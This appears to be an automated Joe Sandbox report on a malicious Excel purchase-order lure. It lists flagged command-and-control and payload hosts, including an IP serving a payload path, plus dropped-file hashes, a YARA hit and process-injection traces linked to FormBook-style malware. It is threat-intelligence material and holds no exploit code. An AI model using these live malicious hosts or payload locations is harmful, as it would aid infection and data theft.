                  http://www.2886080.xyz/Friends/779c899212.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/8c06199930.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.hover.com/domains/resultsfind.exe, 0000000D.00000002.621202000.0000000002D06000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.00000000030E6000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/72f06199866.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/484d06199454.htmlwfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://192.210.150.33powershell.exe, 0000000A.00000002.444696114.000000000287A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/template/news/lvse/skin/html/js/list.jsfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.2886080.xyz/Friends/307a06199631.htmlfind.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  45.33.6.223 | www.sqlite.org | United States | 63949 | LINODE-APLinodeLLCUS | false
                  192.210.150.33 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
                  207.241.232.154 | ia803104.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
                  188.114.97.3 | jiourl.com | European Union | 13335 | CLOUDFLARENETUS | true
                  76.223.54.146 | www.magicface.shop | United States | 16509 | AMAZON-02US | false
                  103.249.106.91 | www.2886080.xyz | China | 137443 | ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | true
                  85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
                  216.40.34.41 | www.gymuniversity.net | Canada | 15348 | TUCOWSCA | false
                  Joe Sandbox version: 40.0.0 Tourmaline
                  Analysis ID: 1493701
                  Start date and time: 2024-08-16 09:31:16 +02:00
                  Joe Sandbox product: CloudBasic
                  Overall analysis duration: 0h 9m 36s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Cookbook file name: defaultwindowsofficecookbook.jbs
                  Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed: 16
                  Number of new started drivers analysed: 1
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 2
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Sample name: Mac Purchase Order PO102935.xls
                  Detection: MAL
                  Classification: mal100.troj.spyw.expl.evad.winXLS@15/34@16/8
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:
                  • Successful, ratio: 86%
                  • Number of executed functions: 66
                  • Number of non-executed functions: 185
                  Cookbook Comments:
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, WMIADAP.exe, conhost.exe
                  • Execution Graph export aborted for target EQNEDT32.EXE, PID 300 because there are no executed function
                  • Execution Graph export aborted for target powershell.exe, PID 3148 because it is empty
                  • Execution Graph export aborted for target wfbjvizcWo.exe, PID 1372 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  Time | Type | Description
                  03:32:39 | API Interceptor | 33x Sleep call for process: EQNEDT32.EXE modified
                  03:32:41 | API Interceptor | 17x Sleep call for process: wscript.exe modified
                  03:32:42 | API Interceptor | 97x Sleep call for process: powershell.exe modified
                  03:33:12 | API Interceptor | 1390x Sleep call for process: wfbjvizcWo.exe modified
                  03:33:17 | API Interceptor | 542137x Sleep call for process: find.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  45.33.6.223SecuriteInfo.com.PDF.Phishing.7B6B.tr.10532.1457.xlsxGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
                  AWB# 6290868304.docx.docGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
                  PO AFHOR9301604.exeGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
                  RFQ-0122-07-2024.xlsGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2017/sqlite-dll-win32-x86-3200000.zip
                  PO-0122-08-2024.xlsGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2019/sqlite-dll-win32-x86-3290000.zip
                  irlsever.docGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.8256.26893.rtfGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
                  DRAFT CONTRACT COPY_938840.scrGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
                  Invoices_05062024.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                  • www.sqlite.org/2016/sqlite-dll-win32-x86-3140000.zip
                  Price and inventory information PO70964311.pdf.exeGet hashmaliciousFormBookBrowse
                  • www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
                  192.210.150.33PO F03954..xlsGet hashmaliciousFormBookBrowse
                  • 192.210.150.33/88/DAN.txt
                  207.241.232.154SecuriteInfo.com.Exploit.CVE-2017-11882.123.13950.5767.rtfGet hashmaliciousRemcosBrowse
                    SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.14420.14138.xlsxGet hashmaliciousRemcosBrowse
                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.11842.29634.rtfGet hashmaliciousRemcosBrowse
                        PI-0008102024002REMAPX.xla.xlsxGet hashmaliciousRemcosBrowse
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.7487.20111.rtfGet hashmaliciousRemcosBrowse
                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26982.17078.rtfGet hashmaliciousRemcosBrowse
                              SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.19627.13699.xlsxGet hashmaliciousRemcosBrowse
                                SecuriteInfo.com.MSExcel.CVE_2017_0199.G1.exploit.30690.22520.xlsxGet hashmaliciousRemcosBrowse
                                  informe - 2024-08-09T174159.596.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                    solicitud de cotizacion0089087785.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):0.025683810752253594
                                                  Encrypted:false
                                                  SSDEEP:6:I3DPcM3G49HvxggLRKxvvfVjRXv//4tfnRujlw//+GtluJ/eRuj:I3DP7GwPWx/nvYg3J/
                                                  MD5:186DB7206B15C6C5E688114C4A741D59
                                                  SHA1:D47A39580DD7D053BBADE5ABCA93EDC5FBCE9BA5
                                                  SHA-256:DE1DBAB948BC3EAF2875FBAC8EE16D2BB3CFE79C3415CECCE74795D495D4AE0E
                                                  SHA-512:C5DF95A77DC15D195FF143AB63F73542930976AF2E699EDEC7B97A4427A329783603777CAA2EB5E7F7FF50717EEB5B25DA12364224AA99C2D681BC7DC590956E
                                                  Malicious:false
                                                  Reputation:low
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Rich Text Format data, version 1
                                                  Category:dropped
                                                  Size (bytes):87039
                                                  Entropy (8bit):2.707723186913918
                                                  Encrypted:false
                                                  SSDEEP:384:vlljImPUpgbUS2MEEsXAITo5hM0ZjgyrYJ6Y4K0Cgg:9WMmEMAITo5hM0ZjgpJ6Yl
                                                  MD5:D18067E4BE9CA434241869DDA26C5F8F
                                                  SHA1:E3F3ABCC32C87D48037D68577C3B625BB1C02636
                                                  SHA-256:F34155575606C4BB730C370E184B5581E724C35FA0161DA93F37E5263D476650
                                                  SHA-512:1D7BF63A5235E5F9C0815AC50EAD92775E1E6E1F72B3E53E3432B367F4B8504D411AC575085FEA6028085B1790D780F669C80C7455AE9C6C0D89F044A3E053BE
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Process:C:\Windows\SysWOW64\find.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):445968
                                                  Entropy (8bit):7.99884320164708
                                                  Encrypted:true
                                                  SSDEEP:12288:qqKn7azHyK26Fre95sdYzb+tDYlK3uUNBsO3bhvh+eB9Ez:Q+zHc6FreBzsDYUJYCn+eB9Ez
                                                  MD5:0D1613320B79DE7E8C7627C07D19F4A7
                                                  SHA1:F85B78ED8568A648B9134BEB654E384C622C73BD
                                                  SHA-256:E6FC736D8850729EE5D9D65076E0F4A869530B2C5DF7239BDA47051FA3C04BE7
                                                  SHA-512:13C00D2A48A42C3DA05C6F475AB9B0581C951DD62CA0B435C44DBCEFDFC02F14597B2B33AA28D3C4C8526ADB198B24F1A83D92B12612209CA4AED06B80C7CBFA
                                                  Malicious:false
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):182866
                                                  Entropy (8bit):3.862898281280299
                                                  Encrypted:false
                                                  SSDEEP:3072:B/xKUPE+y6rvwugt5pYGwKAyIxFnQ1IlwJCac29W4QcPnybeNdH+CciTXhMhv:/JPE+TwzAyIxFnQ1IlwJCac29W4Qczdc
                                                  MD5:D1E9E89D71457C35E8A8FF31EADFD642
                                                  SHA1:E2654F19CE0282BDB9FA8F4D10ADACB4ADFDFD87
                                                  SHA-256:5471914F742D78458A2D51C614477F695E79A6ED17156B2D735B7B3BEBCBE7D4
                                                  SHA-512:011F62153D1252ADC1A2793F014541ED8AC7B2753069FA66D809DC11AFAA1B64D768383AD4B3F7C0E97605DD28B2047C00C1AEA2DD8EA561026B8F4C013B73ED
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):4610404
                                                  Entropy (8bit):2.4886753023403116
                                                  Encrypted:false
                                                  SSDEEP:12288:gD8dt3iGnjPjIwEasrwvAWXKcnXfxpwZasUkRaNHH/o1PWwTlZoJyS3oJjg4GAQe:gat3wwKuWh1OwLoJboJjg1AuKgNr+x
                                                  MD5:95A1DC4D0C20BE96D2E9C709CD7432BD
                                                  SHA1:6323D9025F40A5A35F28D02A1C17F22B61CB61E5
                                                  SHA-256:4A2169B3600EDD759FEB982CD08606C949F9A463AE3BD6692DEA9E43B74474E1
                                                  SHA-512:C303D1FE86C6B1691DC2E1322EB7167B9A7946FD9E9DD0767AA7594BF950C6D5616B85F834511681E30D0FF0CC34765BCD932731AD5299A6A1A70EA0519BD7DB
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Rich Text Format data, version 1
                                                  Category:dropped
                                                  Size (bytes):87039
                                                  Entropy (8bit):2.707723186913918
                                                  Encrypted:false
                                                  SSDEEP:384:vlljImPUpgbUS2MEEsXAITo5hM0ZjgyrYJ6Y4K0Cgg:9WMmEMAITo5hM0ZjgpJ6Yl
                                                  MD5:D18067E4BE9CA434241869DDA26C5F8F
                                                  SHA1:E3F3ABCC32C87D48037D68577C3B625BB1C02636
                                                  SHA-256:F34155575606C4BB730C370E184B5581E724C35FA0161DA93F37E5263D476650
                                                  SHA-512:1D7BF63A5235E5F9C0815AC50EAD92775E1E6E1F72B3E53E3432B367F4B8504D411AC575085FEA6028085B1790D780F669C80C7455AE9C6C0D89F044A3E053BE
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1288490C.doc, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):4610404
                                                  Entropy (8bit):2.4886753023403116
                                                  Encrypted:false
                                                  SSDEEP:12288:gD8dt3iGnjPjIwEasrwvAWXKcnXfxpwZasUkRaNHH/o1PWwTlZoJyS3oJjg4GAQe:gat3wwKuWh1OwLoJboJjg1AuKgNr+x
                                                  MD5:95A1DC4D0C20BE96D2E9C709CD7432BD
                                                  SHA1:6323D9025F40A5A35F28D02A1C17F22B61CB61E5
                                                  SHA-256:4A2169B3600EDD759FEB982CD08606C949F9A463AE3BD6692DEA9E43B74474E1
                                                  SHA-512:C303D1FE86C6B1691DC2E1322EB7167B9A7946FD9E9DD0767AA7594BF950C6D5616B85F834511681E30D0FF0CC34765BCD932731AD5299A6A1A70EA0519BD7DB
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):45180
                                                  Entropy (8bit):3.1422684533680734
                                                  Encrypted:false
                                                  SSDEEP:384:bgAUPzu5ptXKUw6Lv7Jc90J/342jBZWtgJaENbiKdvJ8+oQs8G/:bgNI2qJ/5jBy2RDBo
                                                  MD5:5E75CD08428DBBE6D14EF77D1FDF8845
                                                  SHA1:BD32DB1F1EEF9C19532E0231BA50D4FEF756D885
                                                  SHA-256:FE77E90A1950A9E07BB9406885CB6C47F4B40B55352D5852F6484FEA926665D1
                                                  SHA-512:3CCACA588CA400E0FCD92823A13FEC598C9C81098A05F653CC7AAF59CB46A75D5C0B27C147F2E0D6AC9613EBAB6F470DB7E5EC61845039A3B5AB71B340C55C71
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):16384
                                                  Entropy (8bit):2.765264748518336
                                                  Encrypted:false
                                                  SSDEEP:96:AkZMPiMnLHrIj4JiiAUMMPPtnLHrIj4JiiAU:iPiMnLLILSPPtnLLIL
                                                  MD5:A2A87F371F2FA4349823444EB1C29290
                                                  SHA1:20919FF701830CDAC8B7F43C7AA31C1C6AF70877
                                                  SHA-256:8532FCEF340522A05AB566D4F580B9685C369BC10AB38971BFF0F760C529E4AF
                                                  SHA-512:70B97C50523999ECECB6E5BD08A4841823C2A75F08A5F25540288C5EAF1C0DF1A143521DC2B34D072F48EA1F14A33761F13F5E22703EB4C48465CDE8E842B054
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):12800
                                                  Entropy (8bit):3.5872069640772786
                                                  Encrypted:false
                                                  SSDEEP:384:tep1aKC0uoeHgYK9OTji3CrHNga0KTDqd1VLClVyqKOTe3hZ:rQoGWHvqJ2TDTcZ
                                                  MD5:A09917A0DEDC505AA1DB246C67376F9B
                                                  SHA1:05786E635F57D6FFC876590E329F94EEC35F4FBA
                                                  SHA-256:FE72E92374FFE6DC8B0C2D8C382A20053DC448D425F4570D7F27E5BFFD168860
                                                  SHA-512:636B45781600A6095A3C869D4719BBB08ADA418F3A3AFF57E12E34BB61FCF90320224C82087D624C9F2EB806ACDC9CE7E77A851277C2E5FEFCD91CD424A6BC3C
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\find.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                  Category:dropped
                                                  Size (bytes):77824
                                                  Entropy (8bit):1.133993246026424
                                                  Encrypted:false
                                                  SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                  MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                  SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                  SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                  SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\find.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                  Category:dropped
                                                  Size (bytes):445968
                                                  Entropy (8bit):7.99884320164708
                                                  Encrypted:true
                                                  SSDEEP:12288:qqKn7azHyK26Fre95sdYzb+tDYlK3uUNBsO3bhvh+eB9Ez:Q+zHc6FreBzsDYUJYCn+eB9Ez
                                                  MD5:0D1613320B79DE7E8C7627C07D19F4A7
                                                  SHA1:F85B78ED8568A648B9134BEB654E384C622C73BD
                                                  SHA-256:E6FC736D8850729EE5D9D65076E0F4A869530B2C5DF7239BDA47051FA3C04BE7
                                                  SHA-512:13C00D2A48A42C3DA05C6F475AB9B0581C951DD62CA0B435C44DBCEFDFC02F14597B2B33AA28D3C4C8526ADB198B24F1A83D92B12612209CA4AED06B80C7CBFA
                                                  Malicious:false
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview:1
                                                  Process:C:\Windows\SysWOW64\find.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5099
                                                  Entropy (8bit):4.34628563675731
                                                  Encrypted:false
                                                  SSDEEP:96:GcuN/gR+7Oc0XRMcCM3KOGOF++BlMtvr9NHY0ac:E/Q+7Oc0JKOBF++Evr9NHcc
                                                  MD5:248209B7183B5D5B667DFD77EE847763
                                                  SHA1:69B2CA31C9656E2B9BBB5A04CDB61047BED37F50
                                                  SHA-256:9FB7168694EBFA19383DE44AC8AA1B5341DEA5FC228DC7CCE8008C643807FDCE
                                                  SHA-512:108963CAFD9BC58FE0ACFB0A74D499549C275C523CB3E29ED4FA762DE0EBF9985B94AF414E29755808C5A19EBDDAA943B9DE8F68F7BD490145CE68DC6CCB7067
                                                  Malicious:false
                                                  Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum
                                                  Process:C:\Windows\SysWOW64\find.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):851887
                                                  Entropy (8bit):6.5044934581559755
                                                  Encrypted:false
                                                  SSDEEP:24576:epcuaweNcfQL25VuB+wiPVoQClfhIC2/X4:epyweNcf9iB+/oQClZV
                                                  MD5:05ACE2F6D9BEF6FD9BBD05EE5262A1F2
                                                  SHA1:5CCE2228E0D9C6CC913CF551E0BF7C76ED74FF59
                                                  SHA-256:002459F4D4758011B4D7F36935F1FE323494B847F8C173A551076A3D30475EBC
                                                  SHA-512:1E717A66A72EB626727144FA7458F472ADA54FD1BE37072C9E740945E34BA94025737AEF44E54752C50C5B79A583C6A91A0D8043BF1BF7C3E7CAB8537207F9FC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: AWB# 6290868304.docx.doc, Detection: malicious, Browse
                                                  • Filename: RFQ-0122-07-2024.xls, Detection: malicious, Browse
                                                  • Filename: APR PAYROLL.doc, Detection: malicious, Browse
                                                  • Filename: SSLTD.xls, Detection: malicious, Browse
                                                  • Filename: 81304938_19012023_083155.xls, Detection: malicious, Browse
                                                  • Filename: ORDER SPECIFICATION.xlsx, Detection: malicious, Browse
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):0.025683810752253594
                                                  Encrypted:false
                                                  SSDEEP:6:I3DPcM3G49HvxggLRKxvvfVjRXv//4tfnRujlw//+GtluJ/eRuj:I3DP7GwPWx/nvYg3J/
                                                  MD5:186DB7206B15C6C5E688114C4A741D59
                                                  SHA1:D47A39580DD7D053BBADE5ABCA93EDC5FBCE9BA5
                                                  SHA-256:DE1DBAB948BC3EAF2875FBAC8EE16D2BB3CFE79C3415CECCE74795D495D4AE0E
                                                  SHA-512:C5DF95A77DC15D195FF143AB63F73542930976AF2E699EDEC7B97A4427A329783603777CAA2EB5E7F7FF50717EEB5B25DA12364224AA99C2D681BC7DC590956E
                                                  Malicious:false
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):131072
                                                  Entropy (8bit):0.025617208667557248
                                                  Encrypted:false
                                                  SSDEEP:6:I3DPciWJzRvxggLR1yEWsZMDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPXWJRJyENivYg3J/
                                                  MD5:6DDAAAAA360ECEDA788A57E813B6826C
                                                  SHA1:DF9A5875048449A81181F9565C4294890AD6A25F
